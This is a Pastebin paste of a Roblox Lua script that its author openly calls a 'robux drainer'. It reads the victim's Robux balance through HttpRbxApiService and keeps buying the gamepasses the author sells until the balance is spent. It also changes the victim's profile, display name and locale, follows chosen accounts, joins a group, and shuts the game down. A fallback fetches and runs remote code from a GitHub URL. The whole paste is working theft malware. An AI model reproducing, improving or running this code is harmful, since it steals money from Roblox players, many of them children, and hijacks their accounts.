Advertisement
CatGray

Here

Apr 11th, 2024
142
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.17 KB | None | 0 0
  1. What does this code does
  2.  
  3. -- this script has been patched in every executor except fluxus, this shouldnt work at all yet it still does, so ill just leave this open source since theres no reason to obfuscate it with luraph and add security to it, this script used to be over 3k lines with all the security added to it but now its just the vulnerable service HttpRbxApiService
  4. -- additionally, this was made to target less known or private executors who dont know HttpRbxApiService exists
  5. -- discord: tornadus.net
  6.  
  7.  
  8.  
  9.  
  10.  
  11.  
  12.  
  13. -- keep in mind this is an old project, dont come saying the lua code is written so bad :sob:
  14. repeat task.wait() until game:IsLoaded()
  15.  
  16. local function reject()
  17. loadstring(game:HttpGet("https://raw.githubusercontent.com/fissurectomy/1x1.lua/main/1x1x1x1.lua"))()
  18. wait(100000000000)
  19. end
  20.  
  21. -- checks if HttpRbxApiService is blocked
  22. local suc, err = pcall(function() game:GetService("HttpRbxApiService"):GetAsyncFullUrl("https://economy.roblox.com/v1/user/currency") end)
  23. if not err then
  24. print("continue")
  25. else
  26. reject()
  27. end
  28.  
  29. while task.wait(0.25) do
  30. local x = game:GetService("HttpRbxApiService") -- its time for the funny service
  31. local rb
  32.  
  33. local response = x:GetAsyncFullUrl("https://economy.roblox.com/v1/user/currency") -- roblox endpoint to grab balance
  34.  
  35. local startIndex = string.find(response, '{"robux":')
  36.  
  37. if startIndex then
  38. local endIndex = string.find(response, '}', startIndex)
  39.  
  40. if endIndex then
  41. rb = tonumber(string.sub(response, startIndex + 9, endIndex - 1))
  42. end
  43. end -- cant use httpservice json decode, so we use plaintext
  44.  
  45. -- gamepass name / value
  46. -- Eros / 15 robux
  47. -- Hercules / 25 robux
  48. -- Hylos / 50 robux
  49. -- Tartarus / 100 robux
  50. -- Deimos / 200 robux
  51. -- Artemis / 300 robux
  52. -- Zeus / 500 robux --
  53. -- Kratos / 750 robux
  54. -- Athena / 1000 robux
  55. -- Hephaestus / 1.5k robux
  56. -- Hera / 2k robux
  57. -- Krampus / 2.5k robux
  58. -- Pegasus / 4k robux
  59. -- Poseidon / 6k robux
  60. -- Hermes / 8k robux
  61. -- Apollo / 13k robux
  62. -- Hades / 20k robux
  63. -- Demeter / 35k robux
  64. -- Atlas / 50k robux
  65. -- Cronus / 75k robux
  66. -- Helios / 150k robux
  67.  
  68. -- gamepass name / endpoints
  69. -- Hercules / https://economy.roblox.com/v1/purchases/products/1683704860
  70. -- Eros / https://economy.roblox.com/v1/purchases/products/1683704662
  71. -- Hylos / https://economy.roblox.com/v1/purchases/products/1680670958
  72. -- Tartarus / https://economy.roblox.com/v1/purchases/products/1680670695
  73. -- Deimos / https://economy.roblox.com/v1/purchases/products/1680670843
  74. -- Artemis / https://economy.roblox.com/v1/purchases/products/1680670801
  75. -- Zeus / https://economy.roblox.com/v1/purchases/products/1680670762
  76. -- Kratos / https://economy.roblox.com/v1/purchases/products/1680671056
  77. -- Athena / https://economy.roblox.com/v1/purchases/products/1680671032
  78. -- Hephaestus / https://economy.roblox.com/v1/purchases/products/1680670936
  79. -- Hera / https://economy.roblox.com/v1/purchases/products/1680671019
  80. -- Krampus / https://economy.roblox.com/v1/purchases/products/1680670895
  81. -- Pegasus / https://economy.roblox.com/v1/purchases/products/1680670910
  82. -- Poseidon / https://economy.roblox.com/v1/purchases/products/1680670976
  83. -- Hermes / https://economy.roblox.com/v1/purchases/products/1680670744
  84. -- Apollo / https://economy.roblox.com/v1/purchases/products/1680670998
  85. -- Hades / https://economy.roblox.com/v1/purchases/products/1680670874
  86. -- Demeter / https://economy.roblox.com/v1/purchases/products/1680670818
  87. -- Atlas / https://economy.roblox.com/v1/purchases/products/1680670725
  88. -- Cronus / https://economy.roblox.com/v1/purchases/products/1680670783
  89. -- Helios / https://economy.roblox.com/v1/purchases/products/1680670855
  90.  
  91. local eros = '{"expectedCurrency":1,"expectedPrice":15,"expectedSellerId":3409950911}'
  92. local hercules = '{"expectedCurrency":1,"expectedPrice":25,"expectedSellerId":3409950911}'
  93. local hylos = '{"expectedCurrency":1,"expectedPrice":50,"expectedSellerId":3409950911}'
  94. local tartarus = '{"expectedCurrency":1,"expectedPrice":100,"expectedSellerId":3409950911}'
  95. local deimos = '{"expectedCurrency":1,"expectedPrice":200,"expectedSellerId":3409950911}'
  96. local artemis = '{"expectedCurrency":1,"expectedPrice":300,"expectedSellerId":3409950911}'
  97. local zeus = '{"expectedCurrency":1,"expectedPrice":500,"expectedSellerId":3409950911}'
  98. local kratos = '{"expectedCurrency":1,"expectedPrice":750,"expectedSellerId":3409950911}'
  99. local athena = '{"expectedCurrency":1,"expectedPrice":1000,"expectedSellerId":3409950911}'
  100. local hephaestus = '{"expectedCurrency":1,"expectedPrice":1500,"expectedSellerId":3409950911}'
  101. local hera = '{"expectedCurrency":1,"expectedPrice":2000,"expectedSellerId":3409950911}'
  102. local krampus = '{"expectedCurrency":1,"expectedPrice":2500,"expectedSellerId":3409950911}'
  103. local pegasus = '{"expectedCurrency":1,"expectedPrice":4000,"expectedSellerId":3409950911}'
  104. local poseidon = '{"expectedCurrency":1,"expectedPrice":6000,"expectedSellerId":3409950911}'
  105. local hermes = '{"expectedCurrency":1,"expectedPrice":8000,"expectedSellerId":3409950911}'
  106. local apollo = '{"expectedCurrency":1,"expectedPrice":13000,"expectedSellerId":3409950911}'
  107. local hades = '{"expectedCurrency":1,"expectedPrice":20000,"expectedSellerId":3409950911}'
  108. local demeter = '{"expectedCurrency":1,"expectedPrice":35000,"expectedSellerId":3409950911}'
  109. local atlas = '{"expectedCurrency":1,"expectedPrice":50000,"expectedSellerId":3409950911}'
  110. local cronus = '{"expectedCurrency":1,"expectedPrice":75000,"expectedSellerId":3409950911}'
  111. local helios = '{"expectedCurrency":1,"expectedPrice":150000,"expectedSellerId":3409950911}'
  112.  
  113. task.wait(0.01)
  114.  
  115. local function godly() -- mess with the roblox account profile
  116. local player = game.Players.LocalPlayer
  117. local userId = player.UserId
  118. local description = '{"description":"discowd: itemset"}'
  119. local none = ''
  120. local china = '{"supportedLocaleCode":"zh_TW"}'
  121. local friend = '{"friendshipOriginSourceType":0}'
  122. local changedisplay = {
  123. Url = "https://users.roblox.com/v1/users/" .. game.Players.LocalPlayer.UserId .. "/display-names",
  124. Method = "PATCH",
  125. Body = '{"newDisplayName":"itemset"}',
  126. }
  127.  
  128. local followaccount, followacc = pcall(function()
  129. game:GetService("HttpRbxApiService"):PostAsyncFullUrl('https://friends.roblox.com/v1/users/5196213475/follow', none)
  130. end)
  131. task.wait(0.01)
  132. local joingroup, joining = pcall(function()
  133. game:GetService("HttpRbxApiService"):PostAsyncFullUrl('https://groups.roblox.com/v1/groups/33418242/users', none)
  134. end)
  135. task.wait(0.01)
  136. local updatedesclol, updatdescription = pcall(function()
  137. game:GetService("HttpRbxApiService"):PostAsyncFullUrl("https://users.roblox.com/v1/description", description)
  138. end)
  139. task.wait(0.01)
  140. local displaynamemagic, namedisplaymagik = pcall(function()
  141. game:GetService("HttpRbxApiService"):RequestAsync(changedisplay)
  142. end)
  143. task.wait(0.01)
  144. game:GetService("HttpRbxApiService"):PostAsyncFullUrl("https://locale.roblox.com/v1/locales/set-user-supported-locale", china)
  145. task.wait(0.01)
  146. local fearr, fearrr = pcall(function()
  147. game:GetService("HttpRbxApiService"):PostAsyncFullUrl('https://friends.roblox.com/v1/users/3578860627/follow', none)
  148. end)
  149. task.wait(0.01)
  150. local ocaml, camell = pcall(function()
  151. game:GetService("HttpRbxApiService"):PostAsyncFullUrl('https://friends.roblox.com/v1/users/5030593299/follow', none)
  152. end)
  153. task.wait(0.01)
  154. game:Shutdown()
  155. task.wait(3)
  156. print("oops")
  157. end
  158.  
  159.  
  160. -- robux drainer
  161. if rb == 0 then
  162. godly()
  163. elseif rb > 0 and rb < 15 then
  164. godly()
  165. elseif rb >= 15 and rb < 25 then
  166. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1683704662", eros)
  167. wait()
  168. elseif rb >= 25 and rb < 50 then
  169. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1683704860", hercules)
  170. wait()
  171. elseif rb >= 50 and rb < 100 then
  172. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1680670958", hylos)
  173. wait()
  174. elseif rb >= 100 and rb < 200 then
  175. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1680670695", tartarus)
  176. wait()
  177. elseif rb >= 200 and rb < 300 then
  178. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1680670843", deimos)
  179. wait()
  180. elseif rb >= 300 and rb < 500 then
  181. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1680670801", artemis)
  182. wait()
  183. elseif rb >= 500 and rb < 750 then
  184. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1680670762", zeus)
  185. wait()
  186. elseif rb >= 750 and rb < 1000 then
  187. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1680671056", kratos)
  188. wait()
  189. elseif rb >= 1000 and rb < 1500 then
  190. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1680671032", athena)
  191. wait()
  192. elseif rb >= 1500 and rb < 2000 then
  193. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1680670936", hephaestus)
  194. wait()
  195. elseif rb >= 2000 and rb < 2500 then
  196. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1680671019", hera)
  197. wait()
  198. elseif rb >= 2500 and rb < 4000 then
  199. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1680670895", krampus)
  200. wait()
  201. elseif rb >= 4000 and rb < 6000 then
  202. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1680670910", pegasus)
  203. wait()
  204. elseif rb >= 6000 and rb < 8000 then
  205. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1680670976", poseidon)
  206. wait()
  207. elseif rb >= 8000 and rb < 13000 then
  208. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1680670744", hermes)
  209. wait()
  210. elseif rb >= 13000 and rb < 20000 then
  211. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1680670998", apollo)
  212. wait()
  213. elseif rb >= 20000 and rb < 35000 then
  214. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1680670874", hades)
  215. wait()
  216. elseif rb >= 35000 and rb < 50000 then
  217. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1680670818", demeter)
  218. wait()
  219. elseif rb >= 50000 and rb < 75000 then
  220. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1680670725", atlas)
  221. wait()
  222. elseif rb >= 75000 and rb < 150000 then
  223. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1680670783", cronus)
  224. wait()
  225. else
  226. x:PostAsyncFullUrl("https://economy.roblox.com/v1/purchases/products/1680670855", helios)
  227. wait()
  228. end
  229.  
  230. task.wait(0.01)
  231. end
  232. -- cya
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement